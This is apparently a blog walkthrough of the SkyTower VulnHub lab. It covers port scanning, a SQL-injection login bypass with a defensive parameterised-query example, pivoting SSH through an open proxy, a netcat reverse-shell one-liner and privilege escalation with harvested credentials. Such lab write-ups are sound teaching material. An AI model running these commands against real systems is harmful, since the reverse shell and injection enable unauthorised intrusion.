[Hacking series] – SkyTower

Written by  on July 16, 2015 

Code name: SkyTower

Webpage: https://www.vulnhub.com/entry/skytower-1,96/

VM Download: http://download.vulnhub.com/skytower/SkyTower.zip

Challenge: Get root on the system

Just after detecting our victim box on the network, we start scanning it with nmap

# nmap -Pn -p- -A 192.168.11.5


We detected port 80 open, and after browsing to it we can see a simple login form


As always, we can try to dig deeper with nikto

# nikto -h http://192.168.11.5


Nothing special found. The next step will be to test the webapp: it is written in PHP, and we suppose there is a database behind it, so we can try to find a SQL injection.


sqlmap seems to have found something interesting


Oh.. that failed, well you know what they say: 60% of the time, it works every time…

But we can still try to find a way to bypass the login!


Common ways to bypass a PHP login form are strings like (‘ # || ” ; ) combined with boolean expressions that always evaluate to true.
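To show concretely why such strings work and what the fix looks like, here is an added Python/sqlite3 example (not code from the original post or from the SkyTower VM; the table, column names and credentials are constructed): the same login check written with string concatenation and with a parameterised query.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample login table (assumption: the real app's schema is unknown).

    Passwords are stored in plain text on purpose, mirroring what the walkthrough
    later finds on the box; a real application would store a salted hash instead.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (email TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO login VALUES ('alice@example.com', 'correct horse')"
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """String-built query: user input becomes part of the SQL text.

    A quote closes the literal, and an always-true expression such as
    ' OR '1'='1 makes the WHERE clause match every row. (The '#' in the post
    is MySQL comment syntax; SQLite uses '--', but the OR trick works in both.)
    """
    sql = "SELECT email FROM login WHERE email='%s' AND password='%s'" % (
        email,
        password,
    )
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # Malformed injected SQL just fails; it never grants access.
        return False


def hardened_login(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """Parameterised query: the driver sends the input as data, never as SQL text,
    so the same payload is compared literally against the stored password."""
    sql = "SELECT email FROM login WHERE email=? AND password=?"
    return conn.execute(sql, (email, password)).fetchone() is not None


if __name__ == "__main__":
    db = build_db()
    payload = "' OR '1'='1"
    print("vulnerable, injected password:", vulnerable_login(db, "nobody", payload))
    print("hardened,   injected password:", hardened_login(db, "nobody", payload))
```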


Nice, we are in and we got an ssh user:password, let's test it

ssh john@192.168.11.5


That did not work. If we remember the nmap scan, the ssh port is filtered for some reason.

Time to think out of the box: the ssh port is filtered, but the box has an open proxy running. We can try to use it with proxychains and see what happens


We can configure proxychains to use our new proxy by editing /etc/proxychains.conf


Nice, that worked, but.. we are not in?


For some reason the connection gets killed right after our login, but we can work around that with netcat, as we can still run commands on the remote box through ssh. We'll start a netcat listener on our box.

# nc -lvp 8899

Then we'll run a reverse shell one-liner on the victim box through ssh

# proxychains ssh john@192.168.11.5 nc 192.168.11.12 8899 -e /bin/bash


Nice, we are in! What to do now? Gather more information. We saw a webapp before, and PHP webapps that work with databases often store users and passwords in plain text inside .php files


And that's what we got; now we can use this to log into the mysql server and gather more information.

At this point netcat will not let us interact with the mysql server, so we can move to an ssh connection by deleting /home/john/.bashrc and running ssh again (.bashrc contains the code that kills our connection right after login)

# rm /home/john/.bashrc

Just after doing that, we can get into the mysql server by

$ mysql -u root -p

And using the data we just obtained.

Right after that we can browse the server for more data


Nice, user:password for more accounts found

We can now try to use these accounts to get into the system, and see if we can use sudo to get root.

And after a few attempts…..


Game over SkyTower P-)

Category : hacking series
